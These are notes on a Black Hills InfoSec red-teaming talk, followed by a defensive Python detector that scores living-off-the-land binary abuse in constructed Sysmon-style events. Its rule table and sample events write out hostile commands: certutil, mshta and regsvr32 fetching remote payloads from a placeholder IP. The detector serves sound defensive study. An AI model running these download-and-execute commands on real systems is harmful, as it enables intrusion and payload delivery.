My key takeaways
- it’s getting harder to execute malware in a lot of environments, partly due to endpoint (EDR) maturity
- 3 parts of an assumed compromise: privilege escalation, lateral movement, sensitive data access
- Win10 is safer than ever; Windows Defender has also improved
- defense vendors have signatures for almost all Metasploit-generated machine code
- nowadays you can’t use a commodity framework out of the box and get away with it as an attacker/red teamer
- code signing also becomes relevant for red teamers to get their malware to run
- living off the land (LOLBAS) becomes more and more mandatory
- Best EDR? Manual analysis…!
- "blinding the defenders": AMSI and ETW bypasses
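The "living off the land" and "best EDR is manual" takeaways above go together: once attackers stop dropping custom binaries, detection has to look at how signed, built-in Windows tools are being used. Below is an added example (my own code, not from the talk or the BHIS slides) of that kind of manual hunt logic: a small Python detector run over constructed Sysmon-style process-creation events. The binary names come from the LOLBAS project (https://lolbas-project.github.io/); the command-line patterns, the Office-parent heuristic, the `k=v|k=v` event format and the sample events are all assumptions made up for this example.

```python
import re
from dataclasses import dataclass

# Assumed rule table: regexes over the command line of a few binaries listed in the
# LOLBAS project. Names are real Windows binaries; the patterns are a hand-picked
# subset written for this example, not an exhaustive rule set.
LOLBAS_RULES = {
    "certutil.exe": {r"-urlcache": "remote download", r"-decode\b": "base64 decode of a dropped payload"},
    "mshta.exe": {r"https?://": "remote HTA", r"(java|vb)script:": "inline script"},
    "regsvr32.exe": {r"/i:https?://": "remote scriptlet", r"scrobj\.dll": "scrobj.dll loaded"},
    "rundll32.exe": {r"(java|vb)script:": "inline script", r"\\\\[\w.]+\\": "DLL from UNC path"},
    "bitsadmin.exe": {r"/transfer": "BITS download"},
}

# Assumed heuristic: an Office process spawning one of these tools is worth extra weight.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class Finding:
    image: str
    reasons: list
    score: int


def parse_event(line):
    """Parse a constructed 'Key=Value|Key=Value' event line into a dict."""
    return dict(part.split("=", 1) for part in line.strip().split("|"))


def basename(path):
    """Lower-cased file name from a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return a Finding for a suspicious LOLBAS use, or None if nothing matched."""
    image = basename(event.get("Image", ""))
    rules = LOLBAS_RULES.get(image)
    if not rules:
        return None                       # not a binary we track
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    reasons = [why for pat, why in rules.items() if re.search(pat, cmd, re.I)]
    score = len(reasons)
    if parent in OFFICE_PARENTS:          # context counts, not just the binary name
        reasons.append(f"spawned by Office process {parent}")
        score += 2
    if not reasons:
        return None                       # benign use of a dual-use tool
    return Finding(image, reasons, score)


def scan(lines):
    """Run analyze() over raw event lines, dropping blanks and non-findings."""
    return [f for f in (analyze(parse_event(l)) for l in lines if l.strip()) if f]


# Constructed sample events (IP from the TEST-NET-2 documentation range).
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil -urlcache -split -f http://198.51.100.7/a.txt a.txt",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://198.51.100.7/x.hta",
    r"ParentImage=C:\Windows\System32\svchost.exe|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil -verify -urlfetch cert.cer",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe"
    r"|CommandLine=notepad.exe readme.txt",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\regsvr32.exe"
    r"|CommandLine=regsvr32 /s /n /u /i:http://198.51.100.7/file.sct scrobj.dll",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.image:14} score={f.score}  {'; '.join(f.reasons)}")
```

The third sample event is the point of the exercise: certutil doing certificate verification is a legitimate admin use of the same binary, and a rule keyed only on the image name would page on it. Scoring on arguments and parent process is what separates living-off-the-land tradecraft from normal operations, and it is also why this work stays manual: the thresholds and the parent list are judgement calls per environment.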
Env
- Provided by blackhillsinfosec.com
- Presenter: Joff Thyer
- Slides